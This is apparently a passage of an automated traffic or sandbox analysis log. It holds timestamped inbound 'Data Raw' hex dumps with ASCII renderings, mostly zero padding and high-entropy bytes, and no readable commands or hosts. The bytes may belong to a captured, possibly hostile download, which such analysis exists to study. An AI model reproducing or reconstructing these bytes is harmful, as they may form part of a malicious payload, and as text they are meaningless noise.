2021-10-16 14:53:37 UTC	897	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 95 15 74 e5 c0 5f cb be dc 5e 58 60 43 73 b6 dd 21 f4 e3 4e 88 c2 09 3f c2 08 59 8b 3b 7c 16 50 66 3b 81 59 df bc f2 05 1f a9 49 b6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ht_^X`Cs!N?Y;\|Pf;YI
2021-10-16 14:53:37 UTC	913	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	929	IN	Data Raw: 96 08 c6 1b 74 42 7a 6c 4e c8 d1 e3 e0 1b ae db ef 0c d8 63 95 7c c6 9c 52 e5 2d e9 9a 3f 2b 4b 65 d0 2e 41 a4 95 35 f1 6b ac 62 8c 39 14 f6 7a 12 ad d1 52 5f 52 64 99 1f 53 1c 5a 89 91 d2 bb a9 23 0d 56 c2 4e 02 a8 16 29 0f c6 ff 85 4c 46 96 44 08 77 fc 42 5d 15 75 a2 2a 9a 23 af 00 8d d4 91 7f fe d3 f9 43 df ac a6 54 59 59 aa 80 25 6c dc 03 63 60 30 0d 74 92 d8 84 f9 73 34 a8 0c 0e 07 b4 16 d7 91 62 0f cd c8 8e 65 33 57 fb 39 50 6f 9a 3c 54 c6 23 74 a1 be e7 2f bf 93 d8 30 a7 de 95 a5 a0 94 2e a6 eb 7f c4 55 f3 9f bb d2 6f 80 e9 70 99 af 31 88 54 ff 73 cf 16 01 09 f3 3d 1a c8 87 b2 cf 0c 70 ca d1 25 d8 46 50 f7 6e b7 6b 49 80 4e 35 89 e6 f3 d0 3c 7c a9 12 be 8a 88 51 77 79 ea 1a 0a 31 d4 b0 9f 45 6c 6e c1 8e e9 f5 0e 44 c7 54 f0 a9 dd 3d d8 ab 3f 56 cd Data Ascii: tBzlNc\|R-?+Ke.A5kb9zR_RdSZ#VN)LFDwB]u*#CTYY%lc`0ts4be3W9Po<T#t/0.Uop1Ts=p%FPnkIN5<\|Qwy1ElnDT=?V
2021-10-16 14:53:37 UTC	937	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	949	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	965	IN	Data Raw: 13 97 5c 71 d4 46 63 07 19 97 c9 b3 7c 7a 43 8e b0 a1 0b 2c 75 13 af ad 83 0b 2d 66 7c f6 00 cc cc db 13 59 23 34 6e 8c 12 aa 02 62 d8 00 fa 77 0c f4 3d b4 6e 37 9e 27 d0 b4 21 98 7f bc 7e c6 9d bd dc 6a d2 a8 92 91 97 d8 76 2c 03 b7 e5 cb f0 1c 33 3e d9 7a c6 56 7c a5 e8 4b 80 56 fe 02 bd da 05 a1 ba 8a 6a 73 82 9a be ce 94 1f a8 5f 7e 0e fb 00 34 50 36 6e 87 74 4c 31 7b 42 18 8e 2f 52 72 a9 6f a5 9d c2 a3 c7 85 f4 c1 3c ee bb 9f 10 cc 9b a1 e1 dd b6 27 5f a2 db 59 88 5e d8 fe 49 71 72 14 90 64 d1 1b 4b 0d 4f 2a 85 6c c4 4a d3 98 6b 57 02 1a a5 34 e2 d3 0b 52 35 cf 33 98 27 49 4a 99 4e ae 2c 1e f9 0b 62 26 8b 92 98 d4 8a 94 d3 63 03 f7 d4 f5 26 d3 59 f2 0b 4a 8f 77 ae 2f 97 51 65 eb 65 a8 f9 d3 ca 0c 3f 49 45 5e 64 eb 0d 35 ab 4a be 18 ae 13 af 31 7d de Data Ascii: \qFc\|zC,u-f\|Y#4nbw=n7'!~jv,3>zV\|KVjs_~4P6ntL1{B/Rro<'_Y^IqrdKO*lJkW4R53'IJN,b&c&YJw/Qee?IE^d5J1}
2021-10-16 14:53:37 UTC	981	IN	Data Raw: 27 90 d6 00 83 47 9e 99 14 f8 b8 9e 1d 90 14 1c 2c 93 78 a6 e4 e5 4f 59 78 bd 7f e7 b6 6c 59 d4 6a e3 ca b5 42 c6 34 c9 31 f4 73 c6 1b 4c 52 ee 91 09 a9 39 d3 a1 1d 7b 36 5e af c2 32 3a ec 6c a1 bc 6e 75 20 a6 fe e4 7e 2d f4 90 87 e5 db 4e 19 bf 97 57 76 9e 99 3e 1a e9 15 66 f6 4b f1 1f 2c 95 1e e6 7c fa 66 9d 8e 06 2e be f9 9f 40 9b c5 c7 06 14 6f cb fb 5a d2 69 10 c2 0b 04 07 af 4e 1b 65 6c db 36 42 d2 90 d8 78 42 c9 06 b6 67 dd 5a dc 39 66 9d bc d1 13 55 75 d0 a2 92 b2 5f 49 c8 74 fa 07 f7 7c 49 01 c4 a9 36 fc e4 d2 37 9e 03 79 5b 34 1e cd 18 d0 e5 79 fa a5 51 ec ed 67 32 5d 9b 6a cb 0c c3 23 57 8b 2a a6 35 40 ad 50 20 6d 05 7b a8 ef 97 4c c9 eb 74 f6 c5 97 b1 97 1c 01 79 c1 cb c5 a1 05 b0 f2 48 ab 58 a2 b0 56 9d 5f b9 96 6a 04 22 b1 f2 2c b9 3d 5e 53 Data Ascii: 'G,xOYxlYjB41sLR9{6^2:lnu ~-NWv>fK,\|f.@oZiNel6BxBgZ9fUu_It\|I67y[4yQg2]j#W*5@P m{LtyHXV_j",=^S
2021-10-16 14:53:37 UTC	997	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 08 cb 00 57 ed c4 0a d8 55 3b 96 15 75 2b 40 6c 89 ef c1 8a 29 b0 2c d7 ec 63 e1 a2 25 c3 76 fb 81 10 26 a7 0d 72 de 9e c4 ee 06 14 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: iWU;u+@l),c%v&r
2021-10-16 14:53:37 UTC	1013	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1029	IN	Data Raw: d8 37 82 de a2 10 92 90 af db b2 4f 37 58 c4 ef 48 47 8e 33 27 ab 7a 91 f2 ee 11 5f bc cf 57 4b 27 9d f6 ae 64 3e ec 36 8c dc d8 87 69 7b 2a 0a fd 89 82 dd cf e5 a5 37 8e 74 ca ed 58 61 bc e5 72 6f d1 e1 aa 26 32 9d 43 44 32 96 df d7 df 6b 5e f6 67 9b ae c8 8c 52 f4 da 07 1e 53 57 4a 9d e1 c1 d9 24 dd bb 7b f2 5a d6 08 71 bd a0 d5 5f 9c 00 ca ac 4a ed 4a 84 c4 2a 09 3f 6e 21 4e d4 9b b0 c6 23 2a c2 c9 29 a1 46 14 ab 6d cf cb 9b 4f 4f 04 9f 81 97 6c f0 f5 e0 5b 04 13 4a 04 92 38 d3 29 20 8f 37 14 d7 2b 82 9f 44 5e c8 a7 23 c5 5f 09 8c 2a c1 da 24 51 53 2d e4 f0 df 64 d4 e0 fa b0 53 d8 3a 23 f6 93 b9 1a 63 a9 ae fa ba c8 f5 d6 89 74 0a 7d e7 86 7d 66 f5 ad 03 f0 31 50 aa e9 39 1c 4b 2f 32 06 5f 76 4d 68 8f a2 ab 6f e7 b3 d7 66 ae 8d fb 69 6b c7 d3 ef 82 80 Data Ascii: 7O7XHG3'z_WK'd>6i{7tXaro&2CD2k^gRSWJ${Zq_JJ?n!N#)FmOOl[J8) 7+D^#_$QS-dS:#ct}}f1P9K/2_vMhofik
2021-10-16 14:53:37 UTC	1045	IN	Data Raw: 80 42 e6 90 9c 5d e5 df 1e 5b e6 4c 09 b6 b9 0b ac 41 b3 35 91 39 ef 07 76 bf 2e dc dd b3 05 4c 9d 40 cf 1f 17 9e b2 1e 93 b5 14 c5 56 ff b2 8a cc 67 d2 76 6c 98 8b 0a 4a 1d 2a ed 5b e7 b9 11 6e a5 39 b3 bd 7d 43 f6 34 4d 8c c5 60 2c f1 6d 0d 2b 5a b3 b9 55 f3 e0 13 0b 0f 7f 3b b0 4f 32 99 ce c0 72 3b 08 62 08 3c f6 63 48 81 7b 8b be c4 7d 56 e1 c8 dc 84 59 5d 02 e6 c6 f6 70 31 e7 df 11 7e 5d 47 22 4e ba e1 3b 97 75 77 59 4c 79 ea bd 12 72 69 2d 8f cf 55 9e 69 87 59 7d d5 7a 88 1f 8d 1c f4 4e 76 a9 2e c7 de 16 d9 20 54 f3 ba d6 de f8 8a 23 c5 7d 62 1d e6 16 6a 9c 4a 97 ba 8e bc 86 05 89 91 90 57 89 ff a9 05 16 be c5 17 a5 bf 07 d9 19 a5 17 38 4f e3 04 e9 34 c7 72 55 52 08 50 0d 9f 22 b9 28 57 11 74 55 80 fe 84 96 be 20 4d 0b 2e 96 3f f4 1d 51 d0 19 27 e8 Data Ascii: B][LA59v.L@VgvlJ*[n9}C4M`,m+ZU;O2r;b<cH{}VY]p1~]G"N;uwYLyri-UiY}zNv. T#}bjJW8O4rURP"(WtU M.?Q'
2021-10-16 14:53:37 UTC	1061	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1077	IN	Data Raw: ba 39 6e be 90 1f 5a 07 a1 ba 24 de 8e d9 7e 5d 80 29 af 5e 9a 53 07 25 5c b9 51 ef 65 64 de 01 97 e2 9a 0b ee 25 12 bd ce 6e 5e b2 e4 4a eb 62 3a 8e d9 6b f3 34 89 88 43 49 33 6b 6d f7 04 a4 4e c7 b7 c7 b5 03 5a 60 58 bc 83 9d 1d ee 9a 0a 36 a7 68 90 ad 6c 7c 7e 90 e4 ce 82 ae b6 b2 7a 5b b6 cc 18 bf 86 2a ff 0d 87 ae 33 8b f2 62 17 9d 04 75 e0 51 bb 37 9a 05 7d 78 b8 d5 a3 6a 64 b5 97 91 7d b2 8c bf de d2 eb 44 b0 0c c6 64 5f 4d a5 4e 92 4f e8 18 49 7c 18 19 53 1d ca 82 70 ad 3a da 8d e5 34 21 9f 4e c3 2e 53 e0 b4 33 a3 0a 7a 6c 5d 9b 67 03 a0 91 9f 61 5d 23 b3 88 f9 0d 53 a8 cf 84 58 df 2b 06 cd e1 2e af 70 91 79 dd ec 36 ad 0b 98 c3 7a f9 2d 2a ee e9 9f df b3 f6 71 a0 df 80 23 e1 80 c4 1c b1 a2 0a 55 d9 66 8f 82 be 97 02 f7 23 2b 64 08 ce 46 43 bd 23 Data Ascii: 9nZ$~])^S%\Qed%n^Jb:k4CI3kmNZ`X6hl\|~z[3buQ7}xjd}Dd_MNOI\|Sp:4!N.S3zl]ga]#SX+.py6z-q#Uf#+dFC#
2021-10-16 14:53:37 UTC	1093	IN	Data Raw: 56 f5 6a 35 33 72 71 c7 b9 67 6c ef 5d ca 19 78 c6 b6 43 4e f6 8d 4f 45 a5 67 b6 17 8a 7d 96 9b 63 fe 1b 76 ff bc 64 48 39 f7 bf 14 6a 05 2f 2a 88 c1 5e d6 c1 c9 f8 b3 02 3e 1b ea 2a c7 dd 24 8f 22 db c7 55 4a f0 4c ae 24 b2 8f 42 47 fa 01 89 ba 4e 1f 4e c5 37 dc 4e 75 7c f4 a0 8d 72 9f 38 d3 99 8e b7 5f 28 e2 ca bf 64 ea f7 13 e6 ad 89 10 b1 76 c8 35 e3 72 9f a2 a5 69 b0 50 af 2e b1 48 6e 1c a5 82 df 80 f4 45 e2 ad 13 fd c5 ea a2 3d 1c 7d 19 63 bf 06 10 67 1f 4f 87 0f 71 ea 88 6d 8d 1f ae 48 f8 19 8f bb b4 f7 8e d0 ab c7 de bd f8 ad 31 ee 29 00 36 d7 e4 d4 42 ea 1d 77 01 87 be 63 1f 51 87 74 30 a2 2d e3 8c 71 8e dc 9f 3b f0 80 f3 e3 44 4b a7 26 46 bd ce a9 64 ea 5b bb a5 18 01 03 b9 04 9a df dc e2 50 68 21 a3 6a 34 4e 17 8d 2e 58 7e 1a 0b f7 62 a6 d8 3c Data Ascii: Vj53rqgl]xCNOEg}cvdH9j/^>$"UJL$BGNN7Nu\|r8_(dv5riP.HnE=}cgOqmH1)6BwcQt0-q;DK&Fd[Ph!j4N.X~b<
2021-10-16 14:53:37 UTC	1109	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 2d be 1e 9c ca 71 49 6f 45 10 99 f1 c2 cd 63 4f 0c 93 61 17 32 09 29 15 dd b8 95 20 8c bd bf 67 fe 1b 1b be 8f bf 0a cf 2e 28 4e 51 77 19 d4 88 fc d8 5e 81 a4 eb a1 72 b5 46 03 c9 ad 68 02 46 1e 0c f4 7f 29 59 79 9a 50 2e a5 dc 42 b1 b1 a2 98 13 02 46 64 64 dc f4 cc 4c 96 f2 41 3d af ce 89 ba fd 94 f5 ec ab 0b f3 37 a2 e9 ab c1 ea 81 90 e4 e1 ce 9d 33 a9 9a 27 e2 be da 11 c7 52 d9 62 49 7a 34 f9 a6 90 32 26 42 a9 6b da f1 69 f7 2d 44 0d 98 5d 2c e1 ab 0a 62 66 7d 66 76 20 04 1d 09 2e c5 f2 13 ad 98 de 1b 98 40 b1 93 bc 06 0a b8 f9 21 f1 8a e1 dc 27 ba Data Ascii: ?-qIoEcOa2) g.(NQw^rFhF)YyP.BFddLA=73'RbIz42&Bki-D],bf}fv .@!'
2021-10-16 14:53:37 UTC	1125	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1141	IN	Data Raw: eb 87 d4 c8 50 d8 3e a9 dc a7 d7 33 ed 92 c1 24 ef 4f e7 2b b4 c7 7b 15 2d 10 40 e4 d9 67 31 42 77 35 3a 71 06 0f 32 76 2f 9b 3e 1b ba ee 43 9d 7d a9 f0 ec ab f0 8c c1 5b e9 c4 e7 5a f5 66 37 2b 48 e7 d5 43 c8 a9 8b ab 9d 3b cf 94 89 d0 94 cd e9 98 64 0f 94 b8 42 df 65 c3 6d 51 e8 e4 11 d3 df cf 26 30 c8 c6 f4 bb 4d 38 ad 16 32 17 a4 b6 4b 98 63 9a 0f 36 ba 2e 2e 24 8a f2 8a f7 3a 5b 28 6d e5 54 c8 b0 56 41 13 20 d3 c5 5d 6e 87 4d 05 a4 93 d3 e6 d4 80 5e ef b7 3b 62 4e 12 d6 36 c3 00 d4 bd d2 ea 12 c5 be 71 8e 00 fe 91 12 0d 81 fe cf f4 94 55 7f 9e 19 c7 e7 95 9b 0d 28 46 9f 65 2a 6b aa ff 7d 80 09 96 31 24 97 a0 bf 68 1e 59 ed 4e ce f1 f8 a3 fb 8b ef 5e 0c 16 d5 48 21 28 24 8a f9 b8 81 16 a9 f7 3f 35 b9 dd 88 c6 47 06 91 6d 57 5a 2c 3c c1 9e 10 d8 72 eb Data Ascii: P>3$O+{-@g1Bw5:q2v/>C}[Zf7+HC;dBemQ&0M82Kc6..$:[(mTVA ]nM^;bN6qU(Fe*k}1$hYN^H!($?5GmWZ,<r
2021-10-16 14:53:37 UTC	1157	IN	Data Raw: 62 3e 5e 2c 1c ab 54 c1 a2 71 43 5b f3 b6 4c 87 95 ae 52 f4 9b 3c ea 7c 93 4c d1 c3 ac 8e d8 b6 49 97 aa 15 fd 1f dd 3d 76 9b 00 fc 8f 62 27 ae f5 46 c1 12 62 af f5 59 1b 7d ea e5 53 6f 9b 69 9b 13 9e 3f 3f 4a fe a9 4d 90 63 9d 18 bc fe fa fd cd 7d f3 d4 38 7e 68 7e ef ab bb 9d 37 d1 eb 32 cb 0e 1e 43 82 aa 32 e2 d6 61 de b6 5c 50 99 41 96 9e 24 18 5a f5 5e 8c 6a f6 e9 dc a1 8e ad a1 e1 63 f6 88 b5 3f 33 21 d0 8b 30 cf 58 d5 c3 db 65 20 bf 68 32 3b b3 a8 c8 27 13 b9 e7 b0 74 18 09 50 2a 08 53 79 ee d8 f7 27 5b cc 27 ad 21 e4 97 01 08 39 e9 5b 57 00 28 60 37 57 69 14 39 6c 5c 26 3c 0d f9 65 35 11 84 d9 c9 95 31 9a 08 43 ec 91 ea da 66 c6 bd f9 be 2d a1 e7 8d 18 16 67 83 ad f8 bb b1 65 e9 85 68 5c d5 f4 e1 7f de c0 c7 e2 eb dc c5 70 5c ad c4 d1 6c 73 a5 22 Data Ascii: b>^,TqC[LR<\|LI=vb'FbY}Soi??JMc}8~h~72C2a\PA$Z^jc?3!0Xe h2;'tP*Sy'['!9[W(`7Wi9l\&<e51Cf-geh\p\ls"
2021-10-16 14:53:37 UTC	1173	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1189	IN	Data Raw: f1 6c 33 0a fa 30 b8 8c 77 12 29 f9 95 10 34 7f 8f ab ef ca 34 76 42 28 48 52 92 da 60 0a 47 40 5a 3a 0d c7 ba 61 4c 59 4d b0 49 17 09 f4 2c 01 30 d2 b9 36 04 f8 89 48 36 d9 20 2d 03 dd 38 da ef bc 58 da a4 f9 e7 7b 89 93 d7 60 27 5a f8 7c 68 24 29 e6 72 33 86 46 59 72 f7 8d d5 c0 24 2f 17 2f 2d 84 e2 9e f3 e9 0e 74 e3 2c 5d a4 ea 63 68 9e 15 d2 02 76 cd b6 ce b7 99 d6 06 97 65 a4 52 56 17 c1 a3 45 85 cd f1 9e 58 64 22 dd 5b d1 16 2a 28 3c de 3d 61 f9 3c a7 de ec 28 bf ed 97 24 a4 20 02 87 f7 38 6c 1f 0d 0f 00 00 00 00 4f 76 e0 9d 93 8d 93 89 4b 90 9b ba 85 d8 31 02 c3 47 54 c1 85 d6 be bb 33 70 dd 77 fc 32 6e 5c bc d8 cd 60 e4 27 a2 c3 da b8 08 55 e0 6f dc 90 e9 20 fe 44 b1 3c 21 73 bd e4 af 57 f4 7c a4 f8 59 ad f9 88 09 43 94 44 5d 72 b0 a6 7e e4 93 98 Data Ascii: l30w)44vB(HR`G@Z:aLYMI,06H6 -8X{`'Z\|h$)r3FYr$//-t,]chveRVEXd"[*(<=a<($ 8lOvK1GT3pw2n\`'Uo D<!sW\|YCD]r~
2021-10-16 14:53:37 UTC	1205	IN	Data Raw: b2 00 32 b2 47 85 8d e6 bd ee 20 de 28 39 1f eb eb 0d 56 6d 5e 9f 10 4e fa 6a 85 ee b4 e6 e3 46 7a 2c 1a 4b c7 bf 1d 00 f6 ca 7e 8e cc b3 bc cf 39 09 21 cc 9d 5c 26 d3 3c 0c 3f 00 1b 4b ed 8e 8e ab ef 6f f6 22 39 4f 14 c9 c6 12 e4 9b 68 95 e6 88 8d 6e 4b 47 52 69 64 d1 fb fe 11 9e 86 09 ef f7 4f ed ab 15 d0 c6 67 75 60 ad 1a 83 80 6c cc 47 f3 74 6f 02 5f 13 ed b1 a6 9c e1 cb 11 c5 87 43 e1 2c 9e 8a 1e 5d d8 e9 a7 4a 71 1b e2 ba 0a 69 14 26 19 cc 61 dc 77 f0 20 07 bb 20 65 10 97 9c 6c 7d 25 3e 9d 2d b4 ef a3 a6 f1 28 bb c5 e9 2f bc dc 33 75 7e 87 54 ec 53 fa 7c 3c e7 12 ca 65 7c 58 c0 87 29 db b3 cc 50 54 e8 76 f2 5d 82 bf 21 1f 30 29 8b ea e5 50 03 bc 95 cc 37 ca b6 a1 e0 cc 3e a6 6c 8b 9a 85 95 59 35 59 21 6b 0c 5e ee e2 2f 7f 84 3c 41 f7 68 db c6 11 7c Data Ascii: 2G (9Vm^NjFz,K~9!\&<?Ko"9OhnKGRidOgu`lGto_C,]Jqi&aw el}%>-(/3u~TS\|<e\|X)PTv]!0)P7>lY5Y!k^/<Ah\|
2021-10-16 14:53:37 UTC	1221	IN	Data Raw: e8 13 9e 71 8c 1b 89 07 68 60 31 aa 39 5b 8b 48 74 b7 3c d4 bc 27 cf 35 16 61 3c 03 6b 3e dc fe 0f 94 73 27 a6 42 57 c8 d6 e0 17 60 48 bd f8 18 69 37 32 29 55 85 40 3c b3 41 86 aa be 5c fe 65 16 1f 77 c6 54 44 4c b0 53 cd 99 f8 19 0c fe c4 1e c2 52 d8 7f df d4 2b 0e 2f 98 3a f6 7a cb c5 46 a3 e3 11 5f 9e 73 c3 5f ac 13 7a 19 45 20 f4 7d 1a d4 69 66 85 9c e6 4d 1a 96 eb 0e cb f2 b5 7d 77 73 52 f8 60 6c 40 26 c9 e3 6c 5d 34 7a bf 1c 3b 8c f9 bd 71 57 be 4c 12 d6 b4 7e 0c 97 80 eb cf 5b f9 e6 bf 1a 92 ec 4e 1c 57 66 40 39 29 7e 95 32 15 b4 fa 1a 8b e3 ed cc 13 b0 72 ce ae 6d 0f 76 cb 9a 12 ed 0c d2 aa ca 93 22 c5 1b ff 22 50 d2 45 bd 05 43 b5 cc 49 ca 37 5f 25 eb 7c 82 23 ce e6 38 87 85 8e fc 9b 02 51 a8 63 d5 bc e8 58 ca 93 66 51 29 33 28 9d fd e5 08 af 4e Data Ascii: qh`19[Ht<'5a<k>s'BW`Hi72)U@<A\ewTDLSR+/:zF_s_zE }ifM}wsR`l@&l]4z;qWL~[NWf@9)~2rmv""PECI7_%\|#8QcXfQ)3(N
